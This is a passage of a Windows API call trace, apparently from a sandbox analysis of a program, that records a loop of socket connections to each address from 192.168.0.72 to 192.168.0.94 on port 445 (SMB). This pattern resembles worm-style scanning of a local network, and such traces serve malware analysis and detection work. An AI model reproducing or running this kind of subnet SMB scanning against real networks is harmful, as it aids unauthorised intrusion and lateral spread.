writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0193.731] __WSAFDIsSet (param_1=0x5b8, param_2=0x36ef368) returned 0 [0193.731] GetLastError () returned 0x0 [0193.731] SetLastError (dwErrCode=0x0) [0193.731] GetLastError () returned 0x0 [0193.731] SetLastError (dwErrCode=0x0) [0193.731] htonl (hostlong=0xc0a80048) returned 0x4800a8c0 [0193.731] inet_ntoa (in=0x4800a8c0) returned="192.168.0.72" [0193.731] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0193.731] socket (af=2, type=1, protocol=6) returned 0x5c4 [0193.732] inet_addr (cp="192.168.0.72") returned 0x4800a8c0 [0193.732] htons (hostshort=0x1bd) returned 0xbd01 [0193.732] ioctlsocket (in: s=0x5c4, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0193.732] connect (s=0x5c4, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.72"), namelen=16) returned -1 [0193.732] ioctlsocket (in: s=0x5c4, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0193.732] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0194.746] __WSAFDIsSet (param_1=0x5c4, param_2=0x36ef368) returned 0 [0194.746] GetLastError () returned 0x0 [0194.746] SetLastError (dwErrCode=0x0) [0194.746] GetLastError () returned 0x0 [0194.746] SetLastError (dwErrCode=0x0) [0194.746] htonl (hostlong=0xc0a80049) returned 0x4900a8c0 [0194.746] inet_ntoa (in=0x4900a8c0) returned="192.168.0.73" [0194.746] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0194.746] socket (af=2, type=1, protocol=6) returned 0x5d0 [0194.747] inet_addr (cp="192.168.0.73") returned 0x4900a8c0 [0194.747] htons (hostshort=0x1bd) returned 0xbd01 [0194.747] ioctlsocket (in: s=0x5d0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0194.747] connect (s=0x5d0, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.73"), namelen=16) returned -1 [0194.747] ioctlsocket (in: s=0x5d0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0194.747] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0195.759] __WSAFDIsSet (param_1=0x5d0, param_2=0x36ef368) returned 0 [0195.759] GetLastError () returned 0x0 [0195.759] SetLastError (dwErrCode=0x0) [0195.759] GetLastError () returned 0x0 [0195.759] SetLastError (dwErrCode=0x0) [0195.759] htonl (hostlong=0xc0a8004a) returned 0x4a00a8c0 [0195.759] inet_ntoa (in=0x4a00a8c0) returned="192.168.0.74" [0195.759] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0195.759] socket (af=2, type=1, protocol=6) returned 0x5ac [0195.760] inet_addr (cp="192.168.0.74") returned 0x4a00a8c0 [0195.760] htons (hostshort=0x1bd) returned 0xbd01 [0195.760] ioctlsocket (in: s=0x5ac, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0195.760] connect (s=0x5ac, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.74"), namelen=16) returned -1 [0195.760] ioctlsocket (in: s=0x5ac, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0195.760] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0196.774] __WSAFDIsSet (param_1=0x5ac, param_2=0x36ef368) returned 0 [0196.774] GetLastError () returned 0x0 [0196.774] SetLastError (dwErrCode=0x0) [0196.774] GetLastError () returned 0x0 [0196.775] SetLastError (dwErrCode=0x0) [0196.775] htonl (hostlong=0xc0a8004b) returned 0x4b00a8c0 [0196.775] inet_ntoa (in=0x4b00a8c0) returned="192.168.0.75" [0196.775] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0196.775] socket (af=2, type=1, protocol=6) returned 0x5d8 [0196.775] inet_addr (cp="192.168.0.75") returned 0x4b00a8c0 [0196.775] htons (hostshort=0x1bd) returned 0xbd01 [0196.775] ioctlsocket (in: s=0x5d8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0196.775] connect (s=0x5d8, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.75"), namelen=16) returned -1 [0196.775] ioctlsocket (in: s=0x5d8, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0196.775] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0197.790] __WSAFDIsSet (param_1=0x5d8, param_2=0x36ef368) returned 0 [0197.791] GetLastError () returned 0x0 [0197.791] SetLastError (dwErrCode=0x0) [0197.791] GetLastError () returned 0x0 [0197.791] SetLastError (dwErrCode=0x0) [0197.791] htonl (hostlong=0xc0a8004c) returned 0x4c00a8c0 [0197.791] inet_ntoa (in=0x4c00a8c0) returned="192.168.0.76" [0197.791] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0197.791] socket (af=2, type=1, protocol=6) returned 0x5e4 [0197.791] inet_addr (cp="192.168.0.76") returned 0x4c00a8c0 [0197.791] htons (hostshort=0x1bd) returned 0xbd01 [0197.791] ioctlsocket (in: s=0x5e4, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0197.791] connect (s=0x5e4, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.76"), namelen=16) returned -1 [0197.791] ioctlsocket (in: s=0x5e4, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0197.792] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0198.802] __WSAFDIsSet (param_1=0x5e4, param_2=0x36ef368) returned 0 [0198.802] GetLastError () returned 0x0 [0198.803] SetLastError (dwErrCode=0x0) [0198.803] GetLastError () returned 0x0 [0198.803] SetLastError (dwErrCode=0x0) [0198.803] htonl (hostlong=0xc0a8004d) returned 0x4d00a8c0 [0198.803] inet_ntoa (in=0x4d00a8c0) returned="192.168.0.77" [0198.803] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0198.803] socket (af=2, type=1, protocol=6) returned 0x5ec [0198.803] inet_addr (cp="192.168.0.77") returned 0x4d00a8c0 [0198.803] htons (hostshort=0x1bd) returned 0xbd01 [0198.803] ioctlsocket (in: s=0x5ec, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0198.803] connect (s=0x5ec, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.77"), namelen=16) returned -1 [0198.803] ioctlsocket (in: s=0x5ec, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0198.803] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0199.815] __WSAFDIsSet (param_1=0x5ec, param_2=0x36ef368) returned 0 [0199.815] GetLastError () returned 0x0 [0199.815] SetLastError (dwErrCode=0x0) [0199.816] GetLastError () returned 0x0 [0199.816] SetLastError (dwErrCode=0x0) [0199.816] htonl (hostlong=0xc0a8004e) returned 0x4e00a8c0 [0199.816] inet_ntoa (in=0x4e00a8c0) returned="192.168.0.78" [0199.816] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0199.816] socket (af=2, type=1, protocol=6) returned 0x5f4 [0199.816] inet_addr (cp="192.168.0.78") returned 0x4e00a8c0 [0199.816] htons (hostshort=0x1bd) returned 0xbd01 [0199.816] ioctlsocket (in: s=0x5f4, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0199.816] connect (s=0x5f4, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.78"), namelen=16) returned -1 [0199.822] ioctlsocket (in: s=0x5f4, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0199.822] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0200.836] __WSAFDIsSet (param_1=0x5f4, param_2=0x36ef368) returned 0 [0200.836] GetLastError () returned 0x0 [0200.836] SetLastError (dwErrCode=0x0) [0200.836] GetLastError () returned 0x0 [0200.836] SetLastError (dwErrCode=0x0) [0200.836] htonl (hostlong=0xc0a8004f) returned 0x4f00a8c0 [0200.836] inet_ntoa (in=0x4f00a8c0) returned="192.168.0.79" [0200.837] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0200.837] socket (af=2, type=1, protocol=6) returned 0x5fc [0200.837] inet_addr (cp="192.168.0.79") returned 0x4f00a8c0 [0200.837] htons (hostshort=0x1bd) returned 0xbd01 [0200.837] ioctlsocket (in: s=0x5fc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0200.837] connect (s=0x5fc, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.79"), namelen=16) returned -1 [0200.837] ioctlsocket (in: s=0x5fc, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0200.837] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0201.843] __WSAFDIsSet (param_1=0x5fc, param_2=0x36ef368) returned 0 [0201.843] GetLastError () returned 0x0 [0201.843] SetLastError (dwErrCode=0x0) [0201.843] GetLastError () returned 0x0 [0201.843] SetLastError (dwErrCode=0x0) [0201.843] htonl (hostlong=0xc0a80050) returned 0x5000a8c0 [0201.843] inet_ntoa (in=0x5000a8c0) returned="192.168.0.80" [0201.843] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0201.843] socket (af=2, type=1, protocol=6) returned 0x5e0 [0201.844] inet_addr (cp="192.168.0.80") returned 0x5000a8c0 [0201.844] htons (hostshort=0x1bd) returned 0xbd01 [0201.844] ioctlsocket (in: s=0x5e0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0201.844] connect (s=0x5e0, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.80"), namelen=16) returned -1 [0201.844] ioctlsocket (in: s=0x5e0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0201.844] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0202.858] __WSAFDIsSet (param_1=0x5e0, param_2=0x36ef368) returned 0 [0202.858] GetLastError () returned 0x0 [0202.858] SetLastError (dwErrCode=0x0) [0202.858] GetLastError () returned 0x0 [0202.858] SetLastError (dwErrCode=0x0) [0202.858] htonl (hostlong=0xc0a80051) returned 0x5100a8c0 [0202.858] inet_ntoa (in=0x5100a8c0) returned="192.168.0.81" [0202.859] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0202.859] socket (af=2, type=1, protocol=6) returned 0x60c [0202.859] inet_addr (cp="192.168.0.81") returned 0x5100a8c0 [0202.859] htons (hostshort=0x1bd) returned 0xbd01 [0202.859] ioctlsocket (in: s=0x60c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0202.859] connect (s=0x60c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.81"), namelen=16) returned -1 [0202.859] ioctlsocket (in: s=0x60c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0202.859] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0203.871] __WSAFDIsSet (param_1=0x60c, param_2=0x36ef368) returned 0 [0203.871] GetLastError () returned 0x0 [0203.871] SetLastError (dwErrCode=0x0) [0203.871] GetLastError () returned 0x0 [0203.871] SetLastError (dwErrCode=0x0) [0203.871] htonl (hostlong=0xc0a80052) returned 0x5200a8c0 [0203.871] inet_ntoa (in=0x5200a8c0) returned="192.168.0.82" [0203.871] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0203.871] socket (af=2, type=1, protocol=6) returned 0x614 [0203.872] inet_addr (cp="192.168.0.82") returned 0x5200a8c0 [0203.872] htons (hostshort=0x1bd) returned 0xbd01 [0203.872] ioctlsocket (in: s=0x614, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0203.872] connect (s=0x614, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.82"), namelen=16) returned -1 [0203.872] ioctlsocket (in: s=0x614, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0203.872] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0204.886] __WSAFDIsSet (param_1=0x614, param_2=0x36ef368) returned 0 [0204.886] GetLastError () returned 0x0 [0204.886] SetLastError (dwErrCode=0x0) [0204.886] GetLastError () returned 0x0 [0204.886] SetLastError (dwErrCode=0x0) [0204.886] htonl (hostlong=0xc0a80053) returned 0x5300a8c0 [0204.886] inet_ntoa (in=0x5300a8c0) returned="192.168.0.83" [0204.886] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0204.886] socket (af=2, type=1, protocol=6) returned 0x5c0 [0204.887] inet_addr (cp="192.168.0.83") returned 0x5300a8c0 [0204.887] htons (hostshort=0x1bd) returned 0xbd01 [0204.887] ioctlsocket (in: s=0x5c0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0204.887] connect (s=0x5c0, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.83"), namelen=16) returned -1 [0204.887] ioctlsocket (in: s=0x5c0, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0204.887] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0205.900] __WSAFDIsSet (param_1=0x5c0, param_2=0x36ef368) returned 0 [0205.900] GetLastError () returned 0x0 [0205.900] SetLastError (dwErrCode=0x0) [0205.900] GetLastError () returned 0x0 [0205.900] SetLastError (dwErrCode=0x0) [0205.900] htonl (hostlong=0xc0a80054) returned 0x5400a8c0 [0205.900] inet_ntoa (in=0x5400a8c0) returned="192.168.0.84" [0205.900] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0205.900] socket (af=2, type=1, protocol=6) returned 0x61c [0205.900] inet_addr (cp="192.168.0.84") returned 0x5400a8c0 [0205.900] htons (hostshort=0x1bd) returned 0xbd01 [0205.900] ioctlsocket (in: s=0x61c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0205.900] connect (s=0x61c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.84"), namelen=16) returned -1 [0205.901] ioctlsocket (in: s=0x61c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0205.901] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0206.914] __WSAFDIsSet (param_1=0x61c, param_2=0x36ef368) returned 0 [0206.914] GetLastError () returned 0x0 [0206.915] SetLastError (dwErrCode=0x0) [0206.915] GetLastError () returned 0x0 [0206.915] SetLastError (dwErrCode=0x0) [0206.915] htonl (hostlong=0xc0a80055) returned 0x5500a8c0 [0206.915] inet_ntoa (in=0x5500a8c0) returned="192.168.0.85" [0206.915] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0206.915] socket (af=2, type=1, protocol=6) returned 0x62c [0206.915] inet_addr (cp="192.168.0.85") returned 0x5500a8c0 [0206.915] htons (hostshort=0x1bd) returned 0xbd01 [0206.915] ioctlsocket (in: s=0x62c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0206.915] connect (s=0x62c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.85"), namelen=16) returned -1 [0206.915] ioctlsocket (in: s=0x62c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0206.915] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0207.927] __WSAFDIsSet (param_1=0x62c, param_2=0x36ef368) returned 0 [0207.927] GetLastError () returned 0x0 [0207.927] SetLastError (dwErrCode=0x0) [0207.927] GetLastError () returned 0x0 [0207.927] SetLastError (dwErrCode=0x0) [0207.927] htonl (hostlong=0xc0a80056) returned 0x5600a8c0 [0207.928] inet_ntoa (in=0x5600a8c0) returned="192.168.0.86" [0207.928] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0207.928] socket (af=2, type=1, protocol=6) returned 0x630 [0207.928] inet_addr (cp="192.168.0.86") returned 0x5600a8c0 [0207.928] htons (hostshort=0x1bd) returned 0xbd01 [0207.928] ioctlsocket (in: s=0x630, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0207.928] connect (s=0x630, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.86"), namelen=16) returned -1 [0207.929] ioctlsocket (in: s=0x630, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0207.929] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0208.943] __WSAFDIsSet (param_1=0x630, param_2=0x36ef368) returned 0 [0208.943] GetLastError () returned 0x0 [0208.943] SetLastError (dwErrCode=0x0) [0208.943] GetLastError () returned 0x0 [0208.943] SetLastError (dwErrCode=0x0) [0208.943] htonl (hostlong=0xc0a80057) returned 0x5700a8c0 [0208.943] inet_ntoa (in=0x5700a8c0) returned="192.168.0.87" [0208.943] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0208.943] socket (af=2, type=1, protocol=6) returned 0x63c [0208.943] inet_addr (cp="192.168.0.87") returned 0x5700a8c0 [0208.943] htons (hostshort=0x1bd) returned 0xbd01 [0208.943] ioctlsocket (in: s=0x63c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0208.943] connect (s=0x63c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.87"), namelen=16) returned -1 [0208.943] ioctlsocket (in: s=0x63c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0208.943] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0209.955] __WSAFDIsSet (param_1=0x63c, param_2=0x36ef368) returned 0 [0209.955] GetLastError () returned 0x0 [0209.955] SetLastError (dwErrCode=0x0) [0209.956] GetLastError () returned 0x0 [0209.956] SetLastError (dwErrCode=0x0) [0209.956] htonl (hostlong=0xc0a80058) returned 0x5800a8c0 [0209.956] inet_ntoa (in=0x5800a8c0) returned="192.168.0.88" [0209.956] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0209.956] socket (af=2, type=1, protocol=6) returned 0x134 [0209.956] inet_addr (cp="192.168.0.88") returned 0x5800a8c0 [0209.956] htons (hostshort=0x1bd) returned 0xbd01 [0209.956] ioctlsocket (in: s=0x134, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0209.956] connect (s=0x134, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.88"), namelen=16) returned -1 [0209.956] ioctlsocket (in: s=0x134, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0209.956] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0210.970] __WSAFDIsSet (param_1=0x134, param_2=0x36ef368) returned 0 [0210.971] GetLastError () returned 0x0 [0210.971] SetLastError (dwErrCode=0x0) [0210.971] GetLastError () returned 0x0 [0210.971] SetLastError (dwErrCode=0x0) [0210.971] htonl (hostlong=0xc0a80059) returned 0x5900a8c0 [0210.971] inet_ntoa (in=0x5900a8c0) returned="192.168.0.89" [0210.971] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0210.971] socket (af=2, type=1, protocol=6) returned 0x65c [0210.971] inet_addr (cp="192.168.0.89") returned 0x5900a8c0 [0210.971] htons (hostshort=0x1bd) returned 0xbd01 [0210.971] ioctlsocket (in: s=0x65c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0210.971] connect (s=0x65c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.89"), namelen=16) returned -1 [0210.971] ioctlsocket (in: s=0x65c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0210.971] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0211.983] __WSAFDIsSet (param_1=0x65c, param_2=0x36ef368) returned 0 [0211.983] GetLastError () returned 0x0 [0211.983] SetLastError (dwErrCode=0x0) [0211.983] GetLastError () returned 0x0 [0211.983] SetLastError (dwErrCode=0x0) [0211.983] htonl (hostlong=0xc0a8005a) returned 0x5a00a8c0 [0211.983] inet_ntoa (in=0x5a00a8c0) returned="192.168.0.90" [0211.983] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0211.983] socket (af=2, type=1, protocol=6) returned 0x654 [0211.984] inet_addr (cp="192.168.0.90") returned 0x5a00a8c0 [0211.984] htons (hostshort=0x1bd) returned 0xbd01 [0211.984] ioctlsocket (in: s=0x654, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0211.984] connect (s=0x654, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.90"), namelen=16) returned -1 [0211.984] ioctlsocket (in: s=0x654, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0211.984] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0212.998] __WSAFDIsSet (param_1=0x654, param_2=0x36ef368) returned 0 [0212.999] GetLastError () returned 0x0 [0212.999] SetLastError (dwErrCode=0x0) [0212.999] GetLastError () returned 0x0 [0212.999] SetLastError (dwErrCode=0x0) [0212.999] htonl (hostlong=0xc0a8005b) returned 0x5b00a8c0 [0212.999] inet_ntoa (in=0x5b00a8c0) returned="192.168.0.91" [0212.999] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0212.999] socket (af=2, type=1, protocol=6) returned 0x66c [0212.999] inet_addr (cp="192.168.0.91") returned 0x5b00a8c0 [0212.999] htons (hostshort=0x1bd) returned 0xbd01 [0212.999] ioctlsocket (in: s=0x66c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0212.999] connect (s=0x66c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.91"), namelen=16) returned -1 [0212.999] ioctlsocket (in: s=0x66c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0212.999] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0214.011] __WSAFDIsSet (param_1=0x66c, param_2=0x36ef368) returned 0 [0214.011] GetLastError () returned 0x0 [0214.011] SetLastError (dwErrCode=0x0) [0214.011] GetLastError () returned 0x0 [0214.011] SetLastError (dwErrCode=0x0) [0214.012] htonl (hostlong=0xc0a8005c) returned 0x5c00a8c0 [0214.012] inet_ntoa (in=0x5c00a8c0) returned="192.168.0.92" [0214.012] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0214.012] socket (af=2, type=1, protocol=6) returned 0x664 [0214.012] inet_addr (cp="192.168.0.92") returned 0x5c00a8c0 [0214.012] htons (hostshort=0x1bd) returned 0xbd01 [0214.012] ioctlsocket (in: s=0x664, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0214.012] connect (s=0x664, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.92"), namelen=16) returned -1 [0214.012] ioctlsocket (in: s=0x664, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0214.012] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0215.026] __WSAFDIsSet (param_1=0x664, param_2=0x36ef368) returned 0 [0215.026] GetLastError () returned 0x0 [0215.026] SetLastError (dwErrCode=0x0) [0215.026] GetLastError () returned 0x0 [0215.026] SetLastError (dwErrCode=0x0) [0215.026] htonl (hostlong=0xc0a8005d) returned 0x5d00a8c0 [0215.026] inet_ntoa (in=0x5d00a8c0) returned="192.168.0.93" [0215.027] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0215.027] socket (af=2, type=1, protocol=6) returned 0x678 [0215.027] inet_addr (cp="192.168.0.93") returned 0x5d00a8c0 [0215.027] htons (hostshort=0x1bd) returned 0xbd01 [0215.027] ioctlsocket (in: s=0x678, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0215.027] connect (s=0x678, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.93"), namelen=16) returned -1 [0215.027] ioctlsocket (in: s=0x678, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0215.027] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0216.039] __WSAFDIsSet (param_1=0x678, param_2=0x36ef368) returned 0 [0216.039] GetLastError () returned 0x0 [0216.039] SetLastError (dwErrCode=0x0) [0216.039] GetLastError () returned 0x0 [0216.039] SetLastError (dwErrCode=0x0) [0216.039] htonl (hostlong=0xc0a8005e) returned 0x5e00a8c0 [0216.039] inet_ntoa (in=0x5e00a8c0) returned="192.168.0.94" [0216.039] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0216.039] socket (af=2, type=1, protocol=6) returned 0x674 [0216.040] inet_addr (cp="192.168.0.94") returned 0x5e00a8c0 [0216.040] htons (hostshort=0x1bd) returned 0xbd01 [0216.040] ioctlsocket (in: s=0x674, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0216.040] connect (s=0x674, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.94"), namelen=16) returned -1 [0216.040] ioctlsocket (in: s=0x674, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0216.040] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: 